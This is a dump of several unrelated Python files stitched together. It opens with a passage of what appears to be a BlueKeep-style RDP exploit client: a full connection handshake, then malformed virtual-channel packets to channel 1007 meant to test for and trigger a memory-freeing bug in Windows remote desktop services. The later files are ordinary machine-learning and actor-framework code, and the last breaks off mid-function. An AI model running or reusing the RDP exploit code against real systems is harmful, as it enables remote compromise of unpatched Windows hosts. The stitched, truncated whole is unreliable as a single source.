bit_len = int.from_bytes(server_cert[8:12], byteorder='little')
rsa_pub_exp = int.from_bytes(server_cert[16:20], byteorder='little')
rsa_pub_mod = int.from_bytes(server_cert[20:20+key_len], byteorder='little')
#print('pub_mod = %s' % binascii.hexlify(server_cert[20:20+key_len]))
#print('keylen: %d' % key_len)
#print('bitlen: %d' % bit_len)
#print('pub exp: %d' % rsa_pub_exp)
pubkey = construct((rsa_pub_mod, rsa_pub_exp))
crypt = []
crypt.append(server_ran)
crypt.append(pubkey)
crypt.append(bit_len)
return crypt
# the security exchange (send our client random encrypted with the server's pub RSA key)
def sec_exchange(pubkey, bit_len):
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ca73831d-3661-4700-9357-8f247640c02e
# 5.3.4.1 Encrypting Client Random
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/761e2583-6406-4a71-bfec-cca52294c099
tpkt = binascii.unhexlify('0300') # still require two bytes for size
mcs_pdu = binascii.unhexlify('02f08064000503eb70')
enc_client_ran = pubkey.encrypt(b'A'*32, None)[0]
# reverse for little endian
enc_client_ran = enc_client_ran[::-1]
enc_client_ran = enc_client_ran.ljust(int((bit_len/8)+8), b'\x00')
sec_exchange_len = struct.pack('<I', len(enc_client_ran))
sec_flags = binascii.unhexlify('01000000') #48000000')
sec_exchange_pdu = sec_flags + sec_exchange_len + enc_client_ran
mcs_pdu_size = struct.pack('>H', len(sec_exchange_pdu)+0x8000)
mcs_pdu += mcs_pdu_size
to_send = mcs_pdu + sec_exchange_pdu
#add 4 for tpkt hdr/size
total_size = len(to_send) + 4
tpkt += struct.pack('>H', total_size) + to_send
return tpkt
# client info
def client_info(crypter, name):
packet_hdr = binascii.unhexlify('0300015902f08064000503eb70814a48000000')
packet = binascii.unhexlify('00000000330100000000100000000000000000')
# 2 byte unicode for the name
name = b''.join([b'0'+bytes([b]) for b in name])
packet += name
packet += binascii.unhexlify('00000000000000000002001a003100390032002e003100360038002e0030002e003300340000003c0043003a005c00570049004e004e0054005c00530079007300740065006d00330032005c006d007300740073006300610078002e0064006c006c0000002c0100004700540042002c0020006e006f0072006d0061006c0074006900640000000000000000000000000000000000000000000000000000000000000000000000000000000a00000005000300000000000000000000004700540042002c00200073006f006d006d006100720074006900640000000000000000000000000000000000000000000000000000000000000000000000000000000300000005000200000000000000c4ffffff00000000270000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + packet_sig + packet_enc
# send client confirm active pdu
def client_confirm(crypter):
packet_hdr = binascii.unhexlify('030001bf02f08064000503eb7081b0')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('a4011300ee03ea030100ea0306008e014d53545343000e00000001001800010003000002000000000c04000000000000000002001c00ffff01000100010020035802000001000100000001000000030058000000000000000000000000000000000000000000010014000000010047012a000101010100000000010101010001010000000000010101000001010100000000a1060000000000000084030000000000e40400001300280000000003780000007800000050010000000000000000000000000000000000000000000008000a000100140014000a0008000600000007000c00000000000000000005000c00000000000200020009000800000000000f000800010000000d005800010000000904000004000000000000000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c000800010000000e0008000100000010003400fe000400fe000400fe000800fe000800fe001000fe002000fe004000fe008000fe000001400000080001000102000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client sync
def client_sync(crypter):
packet_hdr = binascii.unhexlify('0300003102f08064000503eb708022')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('16001700ee03ea030100000108001f0000000100ea03')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client cooperate
def client_cooperate(crypter):
packet_hdr = binascii.unhexlify('0300003502f08064000503eb708026')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('1a001700ee03ea03010000010c00140000000400000000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client control request
def client_control_req(crypter):
packet_hdr = binascii.unhexlify('0300003502f08064000503eb708026')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('1a001700ee03ea03010000010c00140000000100000000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client persistent key length
def client_persistent_key_len(crypter):
packet_hdr = binascii.unhexlify('0300003d02f08064000503eb70802e')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('22001700ee03ea030100000114001c00000001000000000000000000000000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client font list
def client_font_list(crypter):
packet_hdr = binascii.unhexlify('0300003502f08064000503eb708026')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('1a001700ee03ea03010000010c00270000000000000003003200')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
def send_dc():
return binascii.unhexlify('0300000b06800000000000')
# params
# initiator is two byte channel initiator
# channelid is two byte channel id
# virt_chan_data is data to send
def write_virtual_channel(crypter, initiator, channelId, virt_chan_data):
tpkt = binascii.unhexlify('0300') # still require two bytes for size
x224 = binascii.unhexlify('02f080')
mcs_pdu = binascii.unhexlify('64')
mcs_pdu += struct.pack('>H', initiator)
mcs_pdu += struct.pack('>H', channelId)
mcs_pdu += binascii.unhexlify('70') # flags had 80
sec_hdr = binascii.unhexlify('08000000')
# channel_pdu_flags = binascii.unhexlify('03000000') # original
channel_pdu_flags = binascii.unhexlify('42424242')
# the len is not correct
channel_pdu_hdr = struct.pack('<I', len(virt_chan_data)) + channel_pdu_flags
virt_chan_pdu = channel_pdu_hdr + virt_chan_data
packet_sig = crypter.sign(virt_chan_pdu)
virt_chan_pdu_enc = crypter.encrypt(virt_chan_pdu)
send_data = sec_hdr + packet_sig + virt_chan_pdu_enc
mcs_pdu_size = struct.pack('>H', len(send_data)+0x8000)
#print('mcs_pdu_size')
#print(binascii.hexlify(mcs_pdu_size))
mcs_pdu += mcs_pdu_size
to_send = x224 + mcs_pdu + send_data
#add 4 for tpkt hdr/size
total_size = len(to_send) + 4
tpkt += struct.pack('>H', total_size) + to_send
#print('len of tpkt')
#print(binascii.hexlify(struct.pack('>H', total_size)))
#print(binascii.hexlify(tpkt))
return tpkt
def test_if_vuln_32(crypter):
to_send = binascii.unhexlify('00000000020000000000000000000000')
return write_virtual_channel(crypter, 7, 1007, to_send)
def test_if_vuln_64(crypter):
to_send = binascii.unhexlify('0000000000000000020000000000000000000000000000000000000000000000')
return write_virtual_channel(crypter, 7, 1007, to_send)
def free_32(crypter):
# packet_hdr = binascii.unhexlify('0300003502f08064000703ef708026')
# sec_hdr = binascii.unhexlify('08000000')
# packet = binascii.unhexlify('1200000003000000000000000200000000000000000000005A5A')
# packet_sig = crypter.sign(packet)
# packet_enc = crypter.encrypt(packet)
# return packet_hdr + sec_hdr + packet_sig + packet_enc
to_send = binascii.unhexlify('000000000200000000000000000000005A5A')
return write_virtual_channel(crypter, 7, 1007, to_send)
def free_64(crypter):
to_send = binascii.unhexlify('00000000000000000200000000000000000000000000000000000000000000005A5A')
return write_virtual_channel(crypter, 7, 1007, to_send)
def get_ran_name():
name = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
return name.encode('utf-8')
# commence janky parsing
# might be useful
def get_tpkt_size(tpkt):
return int.from_bytes(tpkt[2:4], byteorder='big')
def read_rdp_data(s, crypter):
resp = b''
while True:
resp = resp + s.recv(8192)
len_msg = len(resp)
tpkt_offset = resp.find(b'\x03\x00')
size = get_tpkt_size(resp[tpkt_offset:tpkt_offset+4])
if size <= len_msg:
parse_data(crypter, resp[tpkt_offset:tpkt_offset+size])
resp = resp[tpkt_offset+size:]
def get_data(crypter, data):
data_len = len(data)
print('len of data = %d' % data_len)
tpkt = data[0:4]
if tpkt[0] != 3:
print('Error not tpkt')
return
size = int.from_bytes(tpkt[2:4], byteorder='big')
print('size = %d' % size)
parse_data(crypter, data[:size])
parsed = size
while parsed < data_len:
tpkt = data[parsed:parsed+4]
if tpkt[0] != 3:
print('Error not tpkt')
return
size = int.from_bytes(tpkt[2:4], byteorder='big')
parse_data(crypter, data[parsed:parsed+size])
parsed = parsed + size
def parse_data(crypter, data):
tpkt = data[0:4]
ctop = data[4:7]
# PDU
pdu_type = data[7:8]
initiator = data[8:10]
channel_id = data[10:12]
print('data from %d to channel id = %d' % (int.from_bytes(initiator, byteorder='big'), int.from_bytes(channel_id, byteorder='big')))
sec_hdr_offset = data.find(b'\x08\x00\x00\x00')
sec_hdr = data[sec_hdr_offset:sec_hdr_offset+4]
print('sec_hdr: %s' % binascii.hexlify(sec_hdr))
sig = data[sec_hdr_offset+4:sec_hdr_offset+12]
print('sig: %s' % binascii.hexlify(sig))
enc_data = data[sec_hdr_offset+12:]
print('enc_data: %s' % binascii.hexlify(enc_data))
print('decrypted data: %s' % binascii.hexlify(crypter.decrypt(enc_data)))
def connect(s):
name = get_ran_name()
print('[+] initializing connection')
# x.224 connection initiation
s.sendall(connect_req(name))
s.recv(4096)
print('[+] sending basic settings exchange')
# basic settings exchange
s.sendall(mcs_connect_init_pdu())
p = s.recv(4096)
time.sleep(.25)
server_ran, pub_key, bit_len = parse_mcs_conn_resp(p)
client_ran = b'A'*32
# channel connection
print('[+] sending erect domain and attach user')
s.sendall(erect_domain_req())
s.sendall(attach_user_req())
time.sleep(.25)
s.recv(4096)
print('[+] sending channel join requests')
# join requests
channels = get_chan_join_req()
for channel in channels:
s.sendall(binascii.unhexlify(channel))
s.recv(4096)
print('[+] sending security exchange')
# security exchange
s.sendall(sec_exchange(pub_key, bit_len))
time.sleep(.5)
non_fips = rdp_crypto.non_fips(server_ran, client_ran)
crypter = rdp_crypto.rc4_crypter(non_fips)
# client info pdu
s.sendall(client_info(crypter, name))
s.recv(4096)
time.sleep(.5)
# encrypted data begins here
resp = s.recv(8192)
# get_data(crypter, resp)
# print('[+] finalizing connection sequence')
print('[+] sending client confirm')
# send client confirm active pdu
s.sendall(client_confirm(crypter))
time.sleep(.15)
resp = s.recv(8192)
# get_data(crypter, resp)
# send client sync
print('[+] sending client sync')
s.sendall(client_sync(crypter))
time.sleep(.15)
# send client cooperate
print('[+] sending client cooperate')
s.sendall(client_cooperate(crypter))
time.sleep(.15)
# send client control request
print('[+] sending client control req')
s.sendall(client_control_req(crypter))
time.sleep(.15)
resp = s.recv(8192)
# get_data(crypter, resp)
# send client persistent key length
print('[+] sending persistent key len')
s.sendall(client_persistent_key_len(crypter))
time.sleep(.15)
# send client font list
print('[+] sending client font list')
s.sendall(client_font_list(crypter))
print('[+] connection established')
# read_rdp_data(s, crypter)
return crypter
|
501741 | from abc import ABCMeta, abstractmethod
from datetime import timedelta
from examples.cluster_grain_hello_world.messages.protos_pb2 import HelloRequest, HelloResponse
from protoactor.actor.actor_context import Actor, AbstractContext, RootContext, GlobalRootContext
from protoactor.actor.cancel_token import CancelToken
from protoactor.actor.messages import Started, ReceiveTimeout
from protoactor.actor.props import Props
from protoactor.remote.remote import Remote
from protoactor.remote.response import ResponseStatusCode
from protoactor.cluster.grain_call_options import GrainCallOptions
from protoactor.cluster.protos_pb2 import GrainRequest, GrainResponse, GrainErrorResponse
from protoactor.cluster.сluster import Cluster
class AbstractHelloGrain(metaclass=ABCMeta):
@abstractmethod
def say_hello(self, request: HelloRequest) -> HelloResponse:
raise NotImplementedError('Should implement this method')
class HelloGrainClient():
def __init__(self, grain_id: str):
self._grain_id = grain_id
async def say_hello(self, request: HelloRequest, ct: CancelToken = None,
options: GrainCallOptions = None) -> HelloResponse:
if options is None:
options = GrainCallOptions()
grain_request = GrainRequest(method_index=0,
message_data=request.SerializeToString())
async def inner() -> HelloResponse:
# resolve the grain
pid, status_code = await Cluster.get_async(self._grain_id, 'HelloGrain', ct)
if status_code != ResponseStatusCode.OK:
raise Exception(f'Get PID failed with StatusCode: {status_code}')
# request the RPC method to be invoked
grain_response = await GlobalRootContext.request_future(pid, grain_request, ct)
# did we get a response
if isinstance(grain_response, GrainResponse):
return HelloResponse.FromString(grain_response.message_data)
# did we get an error response
if isinstance(grain_response, GrainErrorResponse):
raise Exception(grain_response.err)
raise AttributeError()
for i in range(options.retry_count):
try:
return await inner()
except Exception:
if options.retry_action is not None:
await options.retry_action(i)
return await inner()
class HelloGrainActor(Actor):
def __init__(self):
self._inner = None
async def receive(self, context: AbstractContext) -> None:
message = context.message
if isinstance(message, Started):
self._inner = Grains._hello_grain_factory
context.set_receive_timeout(timedelta(seconds=30))
elif isinstance(message, ReceiveTimeout):
await context.my_self.stop()
elif isinstance(message, GrainRequest):
if message.method_index == 0:
request = HelloRequest.FromString(message.message_data)
try:
response = await self._inner.say_hello(request)
grain_response = GrainResponse(message_data=response.SerializeToString())
await context.respond(grain_response)
except Exception as ex:
grain_error_response = GrainErrorResponse(err=str(ex))
await context.respond(grain_error_response)
class Grains():
def __init__(self):
self._hello_grain_factory = None
def hello_grain_factory(self, factory: AbstractHelloGrain) -> None:
self._hello_grain_factory = factory
Remote().register_known_kind('HelloGrain', Props().from_producer(lambda: HelloGrainActor()))
def hello_grain_client(self, grain_id: str) -> HelloGrainClient:
return HelloGrainClient(grain_id)
|
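A wiring sketch for the classes above; the grain id is illustrative, the `HelloRequest`/`HelloResponse` field names are assumed from the example's proto, and the surrounding remote/cluster startup is omitted:

```python
# Hypothetical wiring of the generated grain classes above.
class HelloGrain(AbstractHelloGrain):
    async def say_hello(self, request: HelloRequest) -> HelloResponse:
        return HelloResponse(message=f'Hello {request.name}')   # field names assumed

grains = Grains()
grains.hello_grain_factory(HelloGrain())           # registers the 'HelloGrain' kind
client = grains.hello_grain_client('my-grain-id')  # returns a HelloGrainClient

# inside an async context, after the cluster is started:
#     response = await client.say_hello(HelloRequest(name='world'))
```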
501744 | import pandas as pd
import swifter # noqa
from nlp_profiler.constants import DEFAULT_PARALLEL_METHOD, SWIFTER_METHOD
from nlp_profiler.generate_features.parallelisation_methods \
import get_progress_bar, using_joblib_parallel, using_swifter
def generate_features(main_header: str,
high_level_features_steps: list,
new_dataframe: pd.DataFrame,
parallelisation_method: str = DEFAULT_PARALLEL_METHOD):
generate_feature_progress_bar = get_progress_bar(high_level_features_steps)
# Use either swifter or joblib Parallel (with delayed), depending on the configured method:
parallelisation_method_function = using_joblib_parallel
if parallelisation_method == SWIFTER_METHOD:
parallelisation_method_function = using_swifter
for _, (new_column, source_column, transformation_function) in \
enumerate(generate_feature_progress_bar):
source_field = new_dataframe[source_column]
generate_feature_progress_bar.set_description(
f'{main_header}: {source_column} => {new_column}'
)
new_dataframe[new_column] = parallelisation_method_function(
source_field, transformation_function, new_column
)
|
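From the loop above, each entry of `high_level_features_steps` is a `(new_column, source_column, transformation_function)` tuple, and the parallelisation helper applies the function per value (inferred from the loop, not verified here). A toy sketch:

```python
# Toy example: derive two features from a text column (column names are illustrative).
import pandas as pd

df = pd.DataFrame({'text': ['hello world', 'short', 'a longer sentence here']})
steps = [
    ('text_length', 'text', len),                        # character count
    ('word_count', 'text', lambda s: len(s.split())),    # whitespace token count
]
generate_features('Toy features', steps, df)
print(df[['text_length', 'word_count']])
```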
501747 | import os, argparse, imageio
import jittor as jt
from jittor import nn
from lib.Network_Res2Net_GRA_NCD import Network
from utils.data_val import test_dataset
jt.flags.use_cuda = 1
parser = argparse.ArgumentParser()
parser.add_argument('--testsize', type=int, default=352, help='testing size')
parser.add_argument('--pth_path', type=str, default='./snapshot/Net_epoch_best.pkl')
opt = parser.parse_args()
for _data_name in ['CAMO', 'COD10K', 'CHAMELEON', 'NC4K']:
data_path = './Dataset/TestDataset/{}/'.format(_data_name)
save_path = './res/{}/{}/'.format(opt.pth_path.split('/')[(- 2)], _data_name)
model = Network()
model.load(opt.pth_path)
model.eval()
os.makedirs(save_path, exist_ok=True)
image_root = '{}/Imgs/'.format(data_path)
gt_root = '{}/GT/'.format(data_path)
test_loader = test_dataset(image_root, gt_root, opt.testsize)\
.set_attrs(batch_size=1, shuffle=False)
for image, gt, name, _ in test_loader:
gt /= (gt.max() + 1e-08)
(res5, res4, res3, res2) = model(image)
res = res2
c, h, w = gt.shape
res = nn.upsample(res, size=(h, w), mode='bilinear')  # resize the prediction to the GT resolution
res = res.sigmoid().data.squeeze()
res = ((res - res.min()) / ((res.max() - res.min()) + 1e-08))
print('> {} - {}'.format(_data_name, name))
imageio.imwrite((save_path + name[0]), res) |
501770 | from utils.load_snips import SNIPS
from collections import defaultdict
import json
from tqdm import tqdm
def predict(args,tokenizer,model,train, test, slots):
base_prefixes = defaultdict(str)
for slot in slots:
for _, b in enumerate(train[slot]):
base_prefixes[slot] += f"{b[0]}=>{slot}={b[1]}\n"
total_results = {}
for idx_b, b in tqdm(enumerate(test),total=len(test)):
result = {}
sequence_slot = {}
for slot, base_prefix in base_prefixes.items():
# print("SLOT:",slot)
prefix = base_prefix+f"{b[0]}=>{slot}="
encoded_prompt = tokenizer.encode(prefix, add_special_tokens=False, return_tensors="pt")
input_ids = encoded_prompt.to(args.device)
output_sequences = model.generate(
input_ids=input_ids,
max_length=args.length + len(encoded_prompt[0]),
temperature=args.temperature,
top_k=args.k,
top_p=args.p,
repetition_penalty=args.repetition_penalty,
do_sample=True,
num_return_sequences=args.num_return_sequences,
)
# Remove the batch dimension when returning multiple sequences
if len(output_sequences.shape) > 2:
output_sequences.squeeze_()
generated_sequences = []
generated_answers = []
for _, generated_sequence in enumerate(output_sequences):
# print("=== GENERATED SEQUENCE {} ===".format(generated_sequence_idx + 1))
generated_sequence = generated_sequence.tolist()
# Decode text
text = tokenizer.decode(generated_sequence, clean_up_tokenization_spaces=True)
# Remove all text after the stop token
# text = text[: text.find(args.stop_token) if args.stop_token else None]
generated_answers.append(text[len(tokenizer.decode(encoded_prompt[0], clean_up_tokenization_spaces=True)) :])
# Add the prompt at the beginning of the sequence. Remove the excess text that was used for pre-processing
total_sequence = (
prefix + text[len(tokenizer.decode(encoded_prompt[0], clean_up_tokenization_spaces=True)) :]
)
generated_sequences.append(total_sequence)
rep = generated_answers[0].lower()
result[slot] = rep.split("\n")[0] ## cleaning: keep only the text before the first newline
sequence_slot[slot] = total_sequence
total_results[idx_b] = {"PRED":result, "query":sequence_slot, "text":b[0],"TAGS":b[1],"GOLD":b[2]}
# if(idx_b==10):break
return total_results
def SNIPS_slot(args,tokenizer,model):
shot = args.shots
domain_set = ["AddToPlaylist", "BookRestaurant", "GetWeather",
"PlayMusic", "RateBook", "SearchCreativeWork",
"SearchScreeningEvent"]
for d in domain_set:
print(f"Domain:{d}")
train, test, slots = SNIPS(args,domain=d,shots=shot)
results = predict(args,tokenizer,model,train, test, slots)
results = {"meta":str(args), "results":results}
with open(f"results/{args.model_name_or_path}_{args.shots}_{d}_{args.balanced}.json", "w", encoding="utf-8") as f:
json.dump(results,f,indent=4) |
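The prompt that `predict()` builds is a few-shot, line-per-example template ending with an unfinished `text=>slot=` pair for the model to complete. A toy sketch of that format (the utterances and slot values are made up):

```python
# Sketch of the few-shot prompt format used above.
train_examples = [("play a song by adele", "adele"),
                  ("put on some beyonce", "beyonce")]
slot = "artist"

prefix = ""
for text, value in train_examples:
    prefix += f"{text}=>{slot}={value}\n"

test_utterance = "play taylor swift for me"
prompt = prefix + f"{test_utterance}=>{slot}="
print(prompt)
# play a song by adele=>artist=adele
# put on some beyonce=>artist=beyonce
# play taylor swift for me=>artist=
```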
501792 | import numpy as np
import cv2
import tensorflow as tf
class Evaluator(object):
def __init__(self, config):
self.mutual_check = True
self.err_thld = config['err_thld']
self.matches = self.bf_matcher_graph()
self.stats = {
'i_eval_stats': np.array((0, 0, 0, 0, 0, 0, 0, 0), np.float32),
'v_eval_stats': np.array((0, 0, 0, 0, 0, 0, 0, 0), np.float32),
'all_eval_stats': np.array((0, 0, 0, 0, 0, 0, 0, 0), np.float32),
}
def homo_trans(self, coord, H):
kpt_num = coord.shape[0]
homo_coord = np.concatenate((coord, np.ones((kpt_num, 1))), axis=-1)
proj_coord = np.matmul(H, homo_coord.T).T
proj_coord = proj_coord / proj_coord[:, 2][..., None]
proj_coord = proj_coord[:, 0:2]
return proj_coord
def bf_matcher_graph(self):
descriptors_a = tf.compat.v1.placeholder(tf.float32, (None, None), 'descriptor_a')
descriptors_b = tf.compat.v1.placeholder(tf.float32, (None, None), 'descriptor_b')
sim = tf.linalg.matmul(descriptors_a, descriptors_b, transpose_b=True)
ids1 = tf.range(0, tf.shape(sim)[0])
nn12 = tf.math.argmax(sim, axis=1, output_type=tf.int32)
if self.mutual_check:
nn21 = tf.math.argmax(sim, axis=0, output_type=tf.int32)
mask = tf.equal(ids1, tf.gather(nn21, nn12))
matches = tf.stack([tf.boolean_mask(ids1, mask), tf.boolean_mask(nn12, mask)])
else:
matches = tf.stack([ids1, nn12])
return matches
def mnn_matcher(self, sess, descriptors_a, descriptors_b):
input_dict = {
"descriptor_a:0": descriptors_a,
"descriptor_b:0": descriptors_b
}
matches = sess.run(self.matches, input_dict)
return matches.T
def feature_matcher(self, sess, ref_feat, test_feat):
matches = self.mnn_matcher(sess, ref_feat, test_feat)
matches = [cv2.DMatch(matches[i][0], matches[i][1], 0) for i in range(matches.shape[0])]
return matches
def get_covisible_mask(self, ref_coord, test_coord, ref_img_shape, test_img_shape, gt_homo, scaling=1.):
ref_coord = ref_coord / scaling
test_coord = test_coord / scaling
proj_ref_coord = self.homo_trans(ref_coord, gt_homo)
proj_test_coord = self.homo_trans(test_coord, np.linalg.inv(gt_homo))
ref_mask = np.logical_and(
np.logical_and(proj_ref_coord[:, 0] < test_img_shape[1] - 1,
proj_ref_coord[:, 1] < test_img_shape[0] - 1),
np.logical_and(proj_ref_coord[:, 0] > 0, proj_ref_coord[:, 1] > 0)
)
test_mask = np.logical_and(
np.logical_and(proj_test_coord[:, 0] < ref_img_shape[1] - 1,
proj_test_coord[:, 1] < ref_img_shape[0] - 1),
np.logical_and(proj_test_coord[:, 0] > 0, proj_test_coord[:, 1] > 0)
)
return ref_mask, test_mask
def get_inlier_matches(self, ref_coord, test_coord, putative_matches, gt_homo, scaling=1.):
p_ref_coord = np.float32([ref_coord[m.queryIdx] for m in putative_matches]) / scaling
p_test_coord = np.float32([test_coord[m.trainIdx] for m in putative_matches]) / scaling
proj_p_ref_coord = self.homo_trans(p_ref_coord, gt_homo)
dist = np.sqrt(np.sum(np.square(proj_p_ref_coord - p_test_coord[:, 0:2]), axis=-1))
inlier_mask = dist <= self.err_thld
inlier_matches = [putative_matches[z] for z in np.nonzero(inlier_mask)[0]]
return inlier_matches
def get_gt_matches(self, ref_coord, test_coord, gt_homo, scaling=1.):
ref_coord = ref_coord / scaling
test_coord = test_coord / scaling
proj_ref_coord = self.homo_trans(ref_coord, gt_homo)
pt0 = np.expand_dims(proj_ref_coord, axis=1)
pt1 = np.expand_dims(test_coord, axis=0)
norm = np.linalg.norm(pt0 - pt1, ord=None, axis=2)
min_dist0 = np.min(norm, axis=1)
min_dist1 = np.min(norm, axis=0)
gt_num0 = np.sum(min_dist0 <= self.err_thld)
gt_num1 = np.sum(min_dist1 <= self.err_thld)
gt_num = (gt_num0 + gt_num1) / 2
return gt_num
def compute_homography_accuracy(self, ref_coord, test_coord, ref_img_shape, putative_matches, gt_homo, scaling=1.):
ref_coord = np.float32([ref_coord[m.queryIdx] for m in putative_matches]) / scaling
test_coord = np.float32([test_coord[m.trainIdx] for m in putative_matches]) / scaling
pred_homo, _ = cv2.findHomography(ref_coord, test_coord, cv2.RANSAC)
if pred_homo is None:
correctness = 0
else:
corners = np.array([[0, 0],
[ref_img_shape[1] / scaling - 1, 0],
[0, ref_img_shape[0] / scaling - 1],
[ref_img_shape[1] / scaling - 1, ref_img_shape[0] / scaling - 1]])
real_warped_corners = self.homo_trans(corners, gt_homo)
warped_corners = self.homo_trans(corners, pred_homo)
mean_dist = np.mean(np.linalg.norm(real_warped_corners - warped_corners, axis=1))
correctness = float(mean_dist <= self.err_thld)
return correctness
def print_stats(self, key):
avg_stats = self.stats[key] / max(self.stats[key][0], 1)
avg_stats = avg_stats[1:]
print('----------%s----------' % key)
print('avg_n_feat', int(avg_stats[0]))
print('avg_rep', avg_stats[1])
print('avg_precision', avg_stats[2])
print('avg_matching_score', avg_stats[3])
print('avg_recall', avg_stats[4])
print('avg_MMA', avg_stats[5])
print('avg_homography_accuracy', avg_stats[6]) |
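A usage sketch for the matcher above; since `bf_matcher_graph` builds TF1-style placeholders, eager execution has to be disabled before constructing the evaluator (descriptor values below are random):

```python
# Sketch: brute-force mutual-NN matching of two random descriptor sets.
import numpy as np
import tensorflow as tf

tf.compat.v1.disable_eager_execution()
evaluator = Evaluator({'err_thld': 3})
sess = tf.compat.v1.Session()

desc_a = np.random.rand(100, 128).astype(np.float32)
desc_b = np.random.rand(120, 128).astype(np.float32)
matches = evaluator.feature_matcher(sess, desc_a, desc_b)
print(len(matches), 'putative matches')
```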
501804 | import os.path as osp
import cv2
import numpy as np
from detecting.datasets import transforms, utils
import glob
import xml.etree.ElementTree as ET
class VocDataSet(object):
def __init__(self, dataset_dir, subset,
flip_ratio=0,
pad_mode='fixed',
mean=(0, 0, 0),
std=(1, 1, 1),
scale=(1024, 800),
keep_aspect = False,
classes = '',
image_dir = '',
label_dir = '',
debug=False):
'''Load a subset of the VOC dataset.
Attributes
---
dataset_dir: The root directory of the VOC dataset.
subset: Which split to load (train, test).
flip_ratio: Float. The probability of flipping an image and its bounding boxes.
pad_mode: Which padding method to use (fixed, non-fixed).
mean: Tuple. Image mean.
std: Tuple. Image standard deviation.
scale: Tuple of two integers. Target image size.
'''
# subset must be 'train' or 'test'
if subset not in ['train', 'test']:
raise AssertionError('subset must be "train" or "test".')
if not classes:
# 20 classes + background
self._classes = ('__background__', # always index 0
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair',
'cow', 'diningtable', 'dog', 'horse',
'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor')
else:
self._classes = classes
if not image_dir:
# image directory
self.image_dir = "{}/{}/VOC2007/JPEGImages".format(dataset_dir, subset)
else:
self.image_dir = image_dir
if not label_dir:
# annotation directory
self.label_dir = "{}/{}/VOC2007/Annotations".format(dataset_dir, subset)
else:
self.label_dir = label_dir
# dictionary mapping class names to indices
self._class_to_ind = dict(zip(self._classes, range(len(self._classes))))
# load the image annotation info
self.img_infos = self._load_ann_info(self.label_dir)
# probability of flipping an image
self.flip_ratio = flip_ratio
# padding mode
if pad_mode in ['fixed', 'non-fixed']:
self.pad_mode = pad_mode
elif subset == 'train':
self.pad_mode = 'fixed'
else:
self.pad_mode = 'non-fixed'
self.keep_aspect = keep_aspect
# ImageTransform preprocesses the images
self.img_transform = transforms.ImageTransform(scale, mean, std, pad_mode, self.keep_aspect)
# BboxTransform preprocesses the bounding boxes
self.bbox_transform = transforms.BboxTransform()
# load the annotation info for all images
def _load_ann_info(self, ann_path, min_size=32):
# holds the per-image info
img_infos = []
# iterate over all xml files under the path
for xml_file in glob.glob(ann_path + '/*.xml'):
# ground-truth box coordinates
gt_bboxes = []
# ground-truth box labels
gt_labels = []
# parse the xml file
tree = ET.parse(xml_file)
root = tree.getroot()
# image file name
filename = root.find('filename').text
# image width
width = int(root.find('size')[0].text)
# image height
height = int(root.find('size')[1].text)
# number of image channels
depth = int(root.find('size')[2].text)
# image shape is (height, width, depth)
shape = (height,width,depth)
# iterate over the annotations in this image
for member in root.findall('object'):
# class name
class_name = member.find('name').text
# box coordinates
x1 = float(member.find('bndbox')[0].text)
y1 = float(member.find('bndbox')[1].text)
x2 = float(member.find('bndbox')[2].text)
y2 = float(member.find('bndbox')[3].text)
# box height
h = y2 - y1
# box width
w = x2 - x1
# skip the annotation if the width or height is invalid
if w < 1 or h < 1:
continue
# top-left and bottom-right corners of the box
bbox = [y1, x1, y2, x2]
# store the box coordinates
gt_bboxes.append(bbox)
# store the corresponding label
gt_labels.append(self._class_to_ind[class_name])
# set the data types
if gt_bboxes:
gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
gt_labels = np.array(gt_labels, dtype=np.int64)
else:
gt_bboxes = np.zeros((0, 4), dtype=np.float32)
gt_labels = np.array([], dtype=np.int64)
# store file_name, gt_bboxes and gt_labels in a dict
info = dict(file_name=filename,
width=width,
height=height,
depth=depth,
shape=shape,
bboxes=gt_bboxes,
labels=gt_labels)
# keep the image only if both sides are at least min_size and the annotation has labels
if min(info['width'], info['height']) >= min_size and info['labels'].shape[0] != 0:
# save this image's info
img_infos.append(info)
return img_infos
# return the number of images
def __len__(self):
return len(self.img_infos)
# supports indexing / iteration
def __getitem__(self, idx):
'''Load the image and its bboxes for the given index.
Args
---
idx: the index of images.
Returns
---
tuple: A tuple containing the following items: image,
bboxes, labels.
'''
# 图片信息
img_info = self.img_infos[idx]
# 读取图片
img = cv2.imread(osp.join(self.image_dir, img_info['file_name']), cv2.IMREAD_COLOR)
# BGR转RGB
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# 获得图片shape
ori_shape = img.shape
# 获得单个对象的标注框坐标
bboxes = img_info['bboxes']
# 获得单个对象的标注框标签
labels = img_info['labels']
# 是否进行翻转
flip = True if np.random.rand() < self.flip_ratio else False
# 处理图片数据
# 得到填充后的图片,resize后图片shape,缩放因子
img, img_shape, scale_factor = self.img_transform(img, flip)
# 填充后的图片shape
pad_shape = img.shape
# 处理标注框数据
